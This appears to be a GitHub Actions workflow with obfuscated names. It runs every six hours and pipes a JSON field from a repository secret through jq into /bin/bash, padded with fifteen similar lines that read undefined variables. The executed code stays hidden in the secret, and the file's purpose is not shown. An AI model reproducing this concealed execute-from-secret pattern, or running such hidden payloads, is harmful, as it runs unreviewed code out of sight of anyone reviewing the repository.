name: shenjushou7610

on:
  workflow_dispatch:
  schedule:
    - cron: '32 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shenjushou7610
        env:
          n78985: ${{ secrets.n78985 }}
        run: |
          echo $n78985 | jq -r .ik9351 | /bin/bash
          echo $lsgy763 | jq -r .s32872 | /bin/bash
          echo $frehb770 | jq -r .u6 | /bin/bash
          echo $gf98203 | jq -r .aahd248 | /bin/bash
          echo $m6 | jq -r .ne117 | /bin/bash
          echo $xlxui3 | jq -r .mkw7444 | /bin/bash
          echo $hf177 | jq -r .ov467 | /bin/bash
          echo $xjy710 | jq -r .imt3490 | /bin/bash
          echo $g67870 | jq -r .fs0776 | /bin/bash
          echo $azasz392 | jq -r .qorte71396 | /bin/bash
          echo $vqsn572 | jq -r .ff4950 | /bin/bash
          echo $onyd4107 | jq -r .o2883 | /bin/bash
          echo $diahj6 | jq -r .h188 | /bin/bash
          echo $pc2 | jq -r .mj950 | /bin/bash
          echo $xzjxq890 | jq -r .bmt169 | /bin/bash
          echo $ft1218 | jq -r .v667 | /bin/bash

